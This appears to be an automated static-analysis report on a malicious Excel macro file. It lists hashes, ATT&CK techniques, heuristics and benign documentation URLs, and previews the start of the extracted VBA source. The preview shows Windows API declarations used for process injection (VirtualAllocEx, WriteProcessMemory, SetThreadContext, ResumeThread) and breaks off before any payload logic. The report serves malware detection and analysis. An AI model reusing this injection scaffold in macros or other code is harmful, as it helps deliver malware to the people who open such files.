Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 df0ce5e374f9ff6a…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 56.8 KB
Created: 2021-09-28 07:50:26 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-10-04

MD5: 4c6e19cd2ac90e7eab01be64492be201
SHA-1: 26f0bed2ba549def4086ad8f094269b03f973cd4
SHA-256: df0ce5e374f9ff6a19bfe6972fba1997241bade22dafa3910269336625a3068c

Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell

The sample contains VBA macros that reference cmd.exe and PowerShell, indicating an intent to execute commands. The extracted macro source is truncated, but the Windows API imports it declares (RtlMoveMemory, CreateProcess and the process-memory functions VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread) suggest it is designed to download and execute a second-stage payload. The extracted URLs are benign documentation links and do not appear to be directly related to the malicious functionality.

Heuristics (4)

  • VBA project inside OOXML [OOXML_VBA] (severity: medium, 2 related findings)
    Document contains a VBA project (VBA macros present)
  • PowerShell reference in VBA [OLE_VBA_PS] (severity: critical)
    PowerShell reference in VBA
  • cmd.exe reference in VBA [OLE_VBA_CMD] (severity: high)
    cmd.exe reference in VBA
  • Embedded URL [EMBEDDED_URL] (severity: info)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html (in document text: OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx (in document text: OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx (in document text: OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx (in document text: OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx (in document text: OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html (in document text: OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx (in document text: OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx (in document text: OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.html (in document text: OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspx (in document text: OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 52518 bytes
SHA-256: f087d651e96d5fe629c89b5dde4f4d1855aea0b9fc03f03aa56ffbc72287b50b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Option Explicit

' ================================================================================
'                      ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
    Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
    Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
    Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
    Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
    Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
    Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
    Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private 
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 115200 bytes
SHA-256: ef4ed641076a54c77dfdf7f3c2031e8b9f01cd0d4037065db283a306021a3447